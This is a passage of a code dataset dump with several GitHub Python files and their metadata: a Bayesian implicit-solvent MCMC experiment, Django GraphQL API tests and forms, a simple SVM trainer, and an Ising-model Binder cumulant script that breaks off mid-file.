path][0])\n\ndef generate_initial_params(n_types):\n return np.hstack([[1.5]*n_types, [0.5]*n_types])\ninitial_params = generate_initial_params(n_types)\n\n# note, gbsa_forcefield will only be used for the gbsa radius definitions\n\nfrom openforcefield.typing.engines.smirnoff.gbsaforces import OBC2\n\nfrom multiprocessing import Pool\nn_subprocesses = 4\n\nkT = kB * temperature\n\nfrom openmmtools.integrators import BAOABIntegrator\nfrom simtk import unit\nfrom simtk import openmm as mm\nfrom simtk.openmm import app\nimport numpy as np\nfrom tqdm import tqdm\n\n\ndef generate_sim(topology, system, platform_name=\"Reference\"):\n if platform_name == \"Reference\":\n platform = mm.Platform.getPlatformByName(\"Reference\")\n platform_properties = None\n elif platform_name == \"CUDA\":\n platform = mm.Platform.getPlatformByName(\"CUDA\")\n platform_properties = {\"CudaPrecision\": \"mixed\"}\n\n baoab = BAOABIntegrator(collision_rate=1 / unit.picosecond, timestep=2 * unit.femtosecond, temperature=temperature)\n sim = app.Simulation(topology, system, baoab, platform=platform, platformProperties=platform_properties)\n return sim\n\ndef generate_implicit_system_from_vacuum_system(system, topology):\n from copy import deepcopy\n implicit_system = deepcopy(system)\n\n #attempt 1: find the OBC force, and put it on the implicit system\n #dummy_forcefield = app.ForceField('amber99_obc.xml')\n #dummy_system = dummy_forcefield.createSystem(topology)\n # TODO: Document why this didn't work\n\n #attempt 2: create implicit solvent system directly\n #dummy_system = topology.createSystem(implicitSolvent=OBC2)\n # TODO: Document why this didn't work\n\n #attempt 3: add each particle manually\n atom_symbols = [a.element.symbol for a in topology.atoms()]\n\n # (radius, scale)\n default = (1.5, 0.5)\n initial_params = {\n 'H': (1.2, 1.425952),\n 'C': (1.7, 1.058554),\n 'N': (1.55, 0.733599),\n 'O': (1.5, 1.061039),\n 'F': (1.5, 0.500000),\n 'Si': (2.1, 0.500000),\n 'P': (1.85, 0.500000),\n 'S': (1.8 - 0.703469, 0.867814),\n 'Cl': (1.7, 0.500000),\n 'Br': (1.5, 0.500000),\n 'I': (1.5, 0.500000),\n }\n\n nb_force = [f for f in system.getForces() if 'Nonbonded' in f.__class__.__name__][0]\n\n obc2 = OBC2()\n for i in range(topology.getNumAtoms()):\n # get (radius, scale) from defaults\n if atom_symbols[i] in initial_params:\n radius, scale = initial_params[atom_symbols[i]]\n else:\n radius, scale = default\n\n # get charge from whatever was assigned in nonbonded force\n charge = nb_force.getParticleParameters(i)[0]\n\n # (charge (elementary charge), radius (nm), scale (nm))\n obc2.addParticle((charge, radius, scale))\n implicit_system.addForce(obc2)\n\n print([f.__class__.__name__ for f in implicit_system.getForces()])\n\n return implicit_system\n\n\nclass Molecule():\n \"\"\"\"\"\"\n def __init__(self, mol, top, sys, pos, xyz_vacuum=[], xyz_implicit=[], expt=0, expt_stdev=1, gbsa_forcefield=gbsa_forcefield):\n \"\"\"\n\n :param mol: oechem.oemol\n :param top: openmm.topology\n :param sys: openmm.system\n :param pos: (n_atoms,3) coordinate array\n :param xyz_vacuum: (n_samples, n_atoms, 3) coordinates array\n :param xyz_implicit: (n_samples, n_atoms, 3) coordinates array\n :param expt: experimental solvation free energy (kT)\n :param expt_stdev: stdev of experimental solvation free energy (kT)\n :param gbsa_forcefield: forcefield to use for GBSA \"types\"\n \"\"\"\n\n self.mol, self.top, self.sys, self.pos = mol, top, sys, pos\n self.n_atoms = self.top.getNumAtoms()\n\n self.vacuum_sim, self.implicit_sim = self.generate_sims(top, sys)\n\n if len(xyz_vacuum) == 0 or len(xyz_implicit) == 0:\n print('generating some samples')\n xyz_vacuum, xyz_implicit = self.get_samples()\n\n\n self.all_snapshots = list(xyz_implicit) + list(xyz_vacuum)\n self.mbar = self.mbar_from_endpoints(xyz_implicit, xyz_vacuum)\n\n self.expt = expt\n self.expt_stdev = expt_stdev\n\n self.gbsa_forcefield = gbsa_forcefield\n self.type_list = [parameter_id_to_index(id) for id in get_parameter_ids(self.gbsa_forcefield, self.mol)]\n\n def generate_sims(self, topology, system):\n implicit_system = generate_implicit_system_from_vacuum_system(system, topology)\n # Generate reference-platform simulations we'll use for energy calculations later\n vacuum_sim = generate_sim(topology, system, \"Reference\")\n implicit_sim = generate_sim(topology, implicit_system, \"Reference\")\n return vacuum_sim, implicit_sim\n\n def simulate(self, sim, init_pos, n_snapshots=5, thinning=1000):\n \"\"\"Collect samples for a given topology / system\"\"\"\n\n sim.context.setPositions(init_pos)\n sim.minimizeEnergy()\n sim.step(thinning)\n\n snapshots = []\n for _ in tqdm(range(n_snapshots)):\n sim.step(thinning)\n snapshots.append(sim.context.getState(getPositions=True).getPositions(asNumpy=True))\n\n xyz = np.array([coords.value_in_unit(unit.nanometers) for coords in snapshots])\n return xyz\n\n def get_samples(self):\n xyz_vacuum = self.simulate(self.vacuum_sim, self.pos)\n xyz_implicit = self.simulate(self.implicit_sim, self.pos)\n\n return xyz_vacuum, xyz_implicit\n\n def mbar_from_endpoints(self, xyz_implicit, xyz_vacuum):\n \"\"\"Given samples (and simulators) in implicit solvent and vacuum, return\n an MBAR object and the solvation free energy...\"\"\"\n snapshot_list = [xyz_implicit, xyz_vacuum]\n all_snapshots = list(snapshot_list[0]) + list(snapshot_list[1])\n N_k = [len(snapshots) for snapshots in snapshot_list]\n\n u_vacuum = []\n u_implicit = []\n\n for xyz in all_snapshots:\n self.vacuum_sim.context.setPositions(xyz)\n self.implicit_sim.context.setPositions(xyz)\n u_vacuum.append(self.vacuum_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_implicit.append(self.implicit_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_kn = np.array([u_vacuum, u_implicit])\n # TODO: Do some sort of validation that this is producing\n from pymbar import MBAR\n\n mbar = MBAR(u_kn, N_k)\n return mbar\n\n\n def parse_params(self, params):\n mid = int(len(params) / 2)\n radii_by_type, scales_by_type = params[:mid], params[mid:]\n\n # need radii_by_type and scales_by_type to be iterable\n if len(params) == 2:\n radii_by_type = [radii_by_type]\n scales_by_type = [scales_by_type]\n\n radii = np.zeros(self.n_atoms)\n scales = np.zeros(self.n_atoms)\n for i in range(self.n_atoms):\n radii[i] = radii_by_type[self.type_list[i]]\n scales[i] = scales_by_type[self.type_list[i]]\n\n return radii, scales\n\n def set_obc2_params(self, params):\n \"\"\"Set the obc2 radii and scale factors of the implicit solvent sim\"\"\"\n\n obc2 = [f for f in self.implicit_sim.system.getForces() if 'GBForce' in f.__class__.__name__][0]\n\n radii, scales = self.parse_params(params)\n\n for i in range(self.n_atoms):\n charge, _, scale = obc2.getParticleParameters(i)\n obc2.setParticleParameters(i, (charge, radii[i], scales[i]))\n obc2.updateParametersInContext(self.implicit_sim.context)\n\n def get_perturbed_solvation_free_energy(self, params):\n \"\"\"Use an mbar object to estimate the free energy from radius/scale parameters...\"\"\"\n self.set_obc2_params(params)\n u_perturbed = []\n for xyz in self.all_snapshots:\n self.implicit_sim.context.setPositions(xyz)\n u_perturbed.append(self.implicit_sim.context.getState(getEnergy=True).getPotentialEnergy() / kT)\n u_ln = np.vstack((self.mbar.u_kn, u_perturbed))\n return self.mbar.computePerturbedFreeEnergies(u_ln)[0][0, 2]\n\n# generate a list of all the molecules from the database, and generate a few samples each\nmolecules = []\nfor i in range(len(generated_systems)):\n mol, top, sys, pos = generated_systems[i]\n samples = generated_samples[i]\n molecules.append(Molecule(mol, top, sys, pos,\n #samples['xyz_vacuum'], samples['xyz_implicit'], # don't look at generated samples\n expt=expt_measurements[i][0],\n expt_stdev=expt_measurements[i][1],\n gbsa_forcefield=gbsa_forcefield))\n\ndef get_pred(mp):\n molecule, params = mp\n return molecule.get_perturbed_solvation_free_energy(params)\n\n\ndef log_likelihood(params):\n \"\"\"Gaussian likelihood using experimental mean and standard deviation\"\"\"\n if np.min(params) <= 0:\n return -np.inf\n\n ll_components = np.zeros(len(molecules))\n preds = np.zeros(len(molecules))\n #from multiprocessing import Pool\n #pool = Pool(n_subprocesses)\n #preds = pool.map(get_pred, [(molecule, params) for molecule in molecules])\n\n for i, molecule in enumerate(molecules):\n preds[i] = molecule.get_perturbed_solvation_free_energy(params)\n ll_components[i] = - (preds[i] - molecule.expt) ** 2 / (2 * molecule.expt_stdev ** 2)\n return np.sum(ll_components)\n\nif __name__ == \"__main__\":\n n_dims = len(initial_params)\n\n # 3. Sample using emcee\n import emcee\n def run_emcee(lnprobfn):\n nwalkers = n_dims * 2\n sampler = emcee.EnsembleSampler(nwalkers=nwalkers,\n dim=n_dims,\n lnpostfn=lnprobfn, threads=n_subprocesses)\n\n X0 = np.vstack([initial_params + np.random.randn(n_dims)*0.01 for _ in range(nwalkers)])\n sampler.run_mcmc(X0, 1000)\n\n return sampler\n\n print('Running MCMC')\n sampler = run_emcee(log_likelihood)\n\n def save_sampler(sampler, name='sampler_results_{}.npz'.format(n_types)):\n np.savez(name,\n flatchain=sampler.flatchain,\n flatlnprobability=sampler.flatlnprobability,\n acceptance_fraction=sampler.acceptance_fraction,\n )\n save_sampler(sampler)\n","repo_name":"openforcefield/bayes-implicit-solvent","sub_path":"bayes_implicit_solvent/hierarchical_typing/full_experiment.py","file_name":"full_experiment.py","file_ext":"py","file_size_in_byte":13613,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"41326468470","text":"import json\nfrom .api import schema\nfrom django.test import TestCase\nfrom graphene.test import Client\nfrom .models import CicReportingTable, CicUsers\nfrom graphene_django.utils.testing import GraphQLTestCase\n\nfilters_query = \"\"\"\n query {\n filters {\n yearMonthList\n tokenNameList\n genderList\n txTypeList\n spendTypeList\n }\n }\n\"\"\"\n\nsummaryData = \"\"\"\nquery summmaryData($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tsummaryData (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\ttotal\n\t start\n\t end\n\t}\n}\n\"\"\"\n\nmonthlyData = \"\"\"\nquery monthlySummaryData($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tmonthlySummaryData (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\ncategoryData = \"\"\"\nquery categorySummary ($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tcategorySummary (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n\t\tlabel\n\t\tvalue\n\t}\n}\n\"\"\"\n\nsubtypeData = \"\"\"\nquery summaryDataSubtype($fromDate:String!, $toDate:String!, $tokenName:[String]!,$spendType:[String]!, $gender:[String]!, $txType:[String]!, $request:String!) {\n\tsummaryDataSubtype (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,spendType:$spendType, gender:$gender, txType:$txType, request:$request) {\n tradeVolumes\n {\n total\n start\n end\n }\n transactionCount\n {\n total\n start\n end\n }\n }\n}\n\"\"\"\n\nbalanceData = \"\"\"\nquery summaryDataBalance($gender:[String]!) {\n\tsummaryDataBalance (gender:$gender) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\ntopTraders = \"\"\"\nquery summaryDataTopTraders($fromDate:String!, $toDate:String!, $tokenName:[String]!,$businessType:[String]!, $gender:[String]!) {\n\tsummaryDataTopTraders (fromDate:$fromDate, toDate:$toDate, tokenName:$tokenName,businessType:$businessType, gender:$gender) {\n\t\tvalue\n\t}\n}\n\"\"\"\n\nsummaryDataQueries = [\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"registeredusers\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"newregisteredusers\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"traders\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"frequenttraders\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount\"}\n]\n\nbalanceDataQueries = [\n\t{\"gender\":[]}\n]\n\nsubtypeDataQueries = [\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"standard\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"disbursements\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"agent_out\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"reclamation\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"unknown\"}\n]\n\nmonthlyDataQueries = [\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-spendtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-spendtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-gender\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-gender\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-time-txsubtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"transactioncount-time-txsubtype\"},\n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"registeredusers-cumulative\"},\t \n\t {\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"users-time-totalvsfrequent\"}\n]\n\ncategoryDataQueries = [\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-category-spendtype\"},\n \t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"spendType\":[], \"gender\":[], \"txType\":[], \"request\":\"tradevolumes-category-gender\"}\n]\n\n\ntopTradersQueries = [\n\t{\"fromDate\":\"2018-09\", \"toDate\":\"2020-03\", \"tokenName\":[],\"businessType\":[], \"gender\":[]}\n]\n\nclass TestAPISchema(GraphQLTestCase):\n\tGRAPHQL_SCHEMA = schema\n\n\tdef setUp(self):\n\t\tself.client = Client(self.GRAPHQL_SCHEMA)\n\t\tCicReportingTable.objects.create(\n\t\t\ttimestamp='2020-01-10 10:00:00',\n\t\t\thash=\"\",\n\t\t\tsource='0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\ts_gender=\"Male\",\n\t\t\ts_business_type=\"Education\",\n\t\t\ts_location=\"\",\n\t\t\ttarget=\"\",\n\t\t\tt_gender=\"\",\n\t\t\tt_business_type=\"Education\",\n\t\t\tt_location=\"\",\n\t\t\tweight=100,\n\t\t\ttokenname=\"Sarafu\",\n\t\t\tupdated='2020-01-10 10:00:00',\n\t\t\ttransfer_subtype=\"STANDARD\",\n\t\t\ttransfer_use=\"\",\n\t\t\taddress=\"\",\n\t\t\trow_created_date = '2020-09-10 10:00:00'\n\t\t\t)\n\n\t\tCicUsers.objects.create(\n\t\t\tcreated = '2020-01-10 10:00:00',\n\t\t\tgender = 'Male',\n\t\t\tlocation = '',\n\t\t\troles = {},\n\t\t\tcurrent_blockchain_address = '0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\tprevious_blockchain_address = '0x3cc06c32c88aba379c4bbd4c9ebda585d7574bbf',\n\t\t\tbusiness_type = 'Labour',\n\t\t\tbal = 4000,\n\t\t\tstart = '2020-01-10 10:00:00',\n\t\t\tlast_send = '2020-01-10 10:00:00',\n\t\t\tdelete_flag = False,\n\t\t\trow_created_date = '2020-09-10 10:00:00'\n\t\t\t)\n\n\n\tdef test_filters_query(self):\n\t\tresponse = self.query(filters_query, op_name = 'filters')\n\t\tcontent = json.loads(response.content)\n\t\t# print(response)\n\t\t# print(content)\n\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_summaryDataQueries(self):\n\t\tfor query in summaryDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tsummaryData, \n\t\t\t\top_name = 'summmaryData',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_monthlyDataQueries(self):\n\t\tfor query in monthlyDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tmonthlyData, \n\t\t\t\top_name = 'monthlySummaryData',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\tdef test_categoryDataQueries(self):\n\t\tfor query in categoryDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tcategoryData, \n\t\t\t\top_name = 'categorySummary',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\n\t\n\tdef test_subtypeDataQueries(self):\n\t\tfor query in subtypeDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tsubtypeData, \n\t\t\t\top_name = 'summaryDataSubtype',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\n\tdef test_balanceDataQueries(self):\n\t\tfor query in balanceDataQueries:\n\t\t\tresponse = self.query(\n\t\t\t\tbalanceData, \n\t\t\t\top_name = 'summaryDataBalance',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t\n\n\n\tdef test_topTradersQueries(self):\n\t\tfor query in topTradersQueries:\n\t\t\tresponse = self.query(\n\t\t\t\ttopTraders, \n\t\t\t\top_name = 'summaryDataTopTraders',\n\t\t\t\tvariables = query)\n\t\t\tcontent = json.loads(response.content)\n\t\t\t# print(response)\n\t\t\t# print(content)\n\t\t\tself.assertResponseNoErrors(response)\t","repo_name":"grassrootseconomics/Accapi","sub_path":"API/cicdashboard/graphqlApi/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":8579,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"20728331556","text":"# -*- coding:utf-8 -*-\nfrom varibles import *\nfrom numpy import *\nimport matplotlib.pyplot as plt\n\n\ndef loadDataSet(fileName):\n dataMat=[];lableMat=[]\n fr=open(fileName,'r')\n for line in fr.readlines():\n lineArr=line.strip().split('\\t')\n dataMat.append([float(lineArr[0]),float(lineArr[1])])\n lableMat.append(float(lineArr[2]))\n return dataMat,lableMat\n\ndef selectJrand(i,m):\n j=i\n while j==i:\n j=int(random.uniform(0,m))\n return j\n\ndef clipAlpha(alp,H,L):\n if alp>H:\n alp=H\n if alp=alpha>=0\n toler is rongcuolv\n \"\"\" \n dataMatrix=mat(dataMatIn)\n lableMat=mat(classLables).transpose()\n b=0;m,n=shape(dataMatrix)\n alphas=mat(zeros((m,1)))\n iter=0\n while iter=0\n # when inaccuracy is greater than toler(which is rongcuolv) and (alphas[i]>0 or alphas[i]abs(toler) and (alphas[i]0)'\n if ((lableMat[i]*Ei < -toler) and (alphas[i] < C)) or \\\n ((lableMat[i]*Ei > toler) and (alphas[i] > 0)):\n j = selectJrand(i,m)\n fXj = float(multiply(alphas,lableMat).T*(dataMatrix*dataMatrix[j,:].T)) + b\n #Ej>0 when lable[i] is 1 else then lable[i] is-1\n Ej = fXj - float(lableMat[j])\n alphaIold = alphas[i].copy()\n alphaJold = alphas[j].copy()\n # use L and H to modify alphas[j] to an area between 0,c\n # if L==H then continue\n # lableMat[i] != lableMat[j] means i,j are not on the same side of border, use -. if equal,use +\n if (lableMat[i] != lableMat[j]):\n L = max(0, alphas[j] - alphas[i])\n H = min(C, C + alphas[j] - alphas[i])\n else:\n L = max(0, alphas[j] + alphas[i] - C)\n H = min(C, alphas[j] + alphas[i])\n # no optimization\n if L == H:\n print(\"L==H\")\n continue \n #Eta is the optimal amount to change alpha[j]\n eta = 2.0 * dataMatrix[i, :]*dataMatrix[j, :].T - dataMatrix[i, :]*dataMatrix[i, :].T - dataMatrix[j, :]*dataMatrix[j, :].T\n #when eta = 0 , calculation of new alpha is too complex for now, so skip it\n if eta >= 0:\n print(\"eta>=0\")\n continue\n #calc it\n alphas[j] -= lableMat[j]*(Ei - Ej)/eta\n # clip it\n alphas[j] = clipAlpha(alphas[j], H, L)\n # if alpha[j] has changed by a small amount\n if (abs(alphas[j] - alphaJold) < 0.00001):\n print(\"j not moving enough\")\n continue\n # change alphas[i] by the same amount of lableMat[j] ,but in the opposite direction\n alphas[i] += lableMat[j]*lableMat[i]*(alphaJold - alphas[j])\n # set the constant term b for these two alphas\n # w= Σ[1~n] ai*yi*xi => b = yj- Σ[1~n] ai*yi(xi*xj)\n # b1 - b = (y1-y) - Σ[1~n] yi*(a1-a)*(xi*x1)\n b1 = b - Ei- lableMat[i]*(alphas[i]-alphaIold)*dataMatrix[i, :]*dataMatrix[i, :].T - lableMat[j]*(alphas[j]-alphaJold)*dataMatrix[i, :]*dataMatrix[j, :].T\n b2 = b - Ej- lableMat[i]*(alphas[i]-alphaIold)*dataMatrix[i, :]*dataMatrix[j, :].T - lableMat[j]*(alphas[j]-alphaJold)*dataMatrix[j, :]*dataMatrix[j, :].T\n if (0 < alphas[i]) and (C > alphas[i]):\n b = b1\n elif (0 < alphas[j]) and (C > alphas[j]):\n b = b2\n else:\n b = (b1 + b2)/2.0\n alphaPairsChanged += 1\n print(\"iter: %d i:%d, pairs changed %d\" % (iter, i, alphaPairsChanged))\n #outside the for loop , if no alpha changed the iter added by 1 ,else set iter to 0\n #if no alpha changed during maxiter ,then while loop end\n if (alphaPairsChanged == 0):\n iter += 1\n else:\n iter = 0\n print(\"iteration number: %d\" % iter)\n return b, alphas\n \ndef calcWs(alphas, dataArr, classLabels): \n X=mat(dataArr)\n lableMat=mat(labelArr).transpose()\n m,n=shape(X)\n w=mat(zeros((n,1)))\n for i in range(n):\n w+=multiply(alphas[i]*lableMat[i],X[i,:].T)\n return w\n\n\ndef plotfig_SVM(xMat, yMat, ws, b, alphas):\n \"\"\"\n 参考地址:\n http://blog.csdn.net/maoersong/article/details/24315633\n http://www.cnblogs.com/JustForCS/p/5283489.html\n http://blog.csdn.net/kkxgx/article/details/6951959\n \"\"\"\n xMat = mat(xMat)\n yMat = mat(yMat)\n\n # b原来是矩阵,先转为数组类型后其数组大小为(1,1),所以后面加[0],变为(1,)\n b = array(b)[0]\n fig = plt.figure()\n ax = fig.add_subplot(111)\n # 注意flatten的用法\n ax.scatter(xMat[:, 0].flatten().A[0], xMat[:, 1].flatten().A[0])\n # x最大值,最小值根据原数据集dataArr[:, 0]的大小而定\n x = arange(-1.0, 10.0, 0.1)\n # 根据x.w + b = 0 得到,其式子展开为w0.x1 + w1.x2 + b = 0, x2就是y值\n y = (-b-ws[0, 0]*x)/ws[1, 0]\n ax.plot(x, y)\n for i in range(shape(yMat[0, :])[1]):\n if yMat[0, i] > 0:\n ax.plot(xMat[i, 0], xMat[i, 1], 'cx')\n else:\n ax.plot(xMat[i, 0], xMat[i, 1], 'kp')\n # 找到支持向量,并在图中标红\n for i in range(100):\n if alphas[i] > 0.0:\n ax.plot(xMat[i, 0], xMat[i, 1], 'ro')\n plt.show()\n\n\nif __name__ == \"__main__\":\n dataArr, labelArr = loadDataSet(inputPath+'/6.SVM/testSet.txt')\n b, alphas = smoSimple(dataArr, labelArr, 0.6, 0.001, 40)\n print('/n/n/n')\n print('b=', b)\n print('alphas=', alphas)\n #alphas[alphas > 0],取数组中大于0的元素 只对numpy 数组可用\n print('alphas[alphas>0]=', alphas[alphas > 0])\n print('shape(alphas[alphas > 0])=', shape(alphas[alphas > 0]))\n for i in range(100):\n if alphas[i] > 0:\n print(dataArr[i], labelArr[i])\n ws = calcWs(alphas, dataArr, labelArr)\n plotfig_SVM(dataArr, labelArr, ws, b, alphas)","repo_name":"nekomaycry/python-learning","sub_path":"svm-simple.py","file_name":"svm-simple.py","file_ext":"py","file_size_in_byte":7064,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"39033609313","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm, UserChangeForm\n\nfrom .models import Question, Answer, User\n\n\nclass RequiredFieldsMixin():\n\n def __init__(self, *args, **kwargs):\n\n super().__init__(*args, **kwargs)\n\n fields_required = getattr(self.Meta, 'fields_required', None)\n\n if fields_required:\n for key in self.fields:\n if key not in fields_required:\n self.fields[key].required = False\n\n\nclass QuestionAdminForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = {\n 'title',\n 'text',\n 'rating',\n 'author'\n }\n\nclass AnswerAdminForm(forms.ModelForm):\n class Meta:\n model = Answer\n fields = {\n 'text',\n 'author',\n 'question',\n 'rating'\n }\n\nclass AnswerForm(forms.Form):\n text = forms.CharField(widget=forms.Textarea)\n\n def save(self, id, user):\n self.cleaned_data['author'] = user\n self.cleaned_data['question'] = Question.objects.get(id=id)\n post = Answer(**self.cleaned_data)\n post.save()\n return post\n\n\nclass QuestionForm(forms.ModelForm):\n class Meta:\n model = Question\n fields = ['title', 'text']\n\n\nclass CustomUserCreationForm(RequiredFieldsMixin, UserCreationForm):\n class Meta(UserCreationForm):\n model = User\n fields = ['username', 'email', 'first_name', 'second_name', 'userpic']\n fields_required = ['username', 'password']\n\n\nclass CustomUserChangeForm(RequiredFieldsMixin, UserChangeForm):\n class Meta:\n model = User\n fields = ('email', 'first_name', 'second_name', 'userpic')\n fields_required = []\n","repo_name":"typhoonseryi/PythonDjango_NewAsk","sub_path":"qa/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"22783026184","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sb\nfrom scipy.optimize import curve_fit\nfrom Metropolis_final import *\n\ndef linear(x,a,b):\n return a*x + b\n\ndef Temp(al, ak, bl, bk):\n return (bl - bk)/(ak - al)\n\ndef DTemp(al, ak, bl, bk, w, dak, dbl, dbk):\n m1 = ((bl/(ak - al))**2)* dbk\n m2 = ((bk/(ak - al))**2)* dbl\n m3 = (((bk-bl)/((ak - al)**2))**2)* w\n m4 = (((bk-bl)/((ak - al)**2))**2)* dak\n return np.sqrt(m1 + m2 + m3 + m4)\n\nMeasurements = 20\nEvents = 3000\nTherm_t = 7000\nDecorr_t = 10\nT_range = np.linspace(2.265, 2.272, num = 8)\n#sets how many binder plots\nL_set = [32, 64]\ncolor_set = ['r', 'b']\ncolor_set_plot = ['red', 'blue']\n#############################\n\n\nA = np.zeros(3)\nB = np.zeros(3)\nDA = np.zeros(3)\nDB = np.zeros(3)\n\nH = 0\nNc = 0\n\nfor L in L_set:\n binder = np.zeros(T_range.shape[0])\n err_binder = np.zeros(T_range.shape[0])\n for mm in range(Measurements):\n if ((mm*100)/Measurements) % 5 == 0: print((mm*100)/Measurements)\n N = 0\n\n for T in T_range:\n\n\n\n S = np.ones((L, L), dtype=int)\n #thermalization\n for tht in range(Therm_t):\n S = metro_swipe(S, T, H)\n\n s_second = 0\n s_fourth = 0\n for ee in range(Events):\n\n m = magnetization(S)\n s_second += m**2\n s_fourth += m**4\n\n\n\n for dct in range(Decorr_t):\n S = metro_swipe(S, T, H)\n\n s_second /= Events\n s_fourth /= Events\n\n\n binder[N] += 1 - ((s_fourth)/(3*(s_second**2)))\n err_binder += (1 - ((s_fourth)/(3*(s_second**2))))**2\n N += 1\n\n binder /= Measurements\n err_binder /= Measurements\n err_binder -= binder**2\n err_binder = np.sqrt(err_binder)\n\n plt.errorbar(T_range, binder, yerr = err_binder, fmt = 'o', ecolor = color_set[Nc], label = str(L))\n popt, pcov = curve_fit(linear, T_range, binder)\n 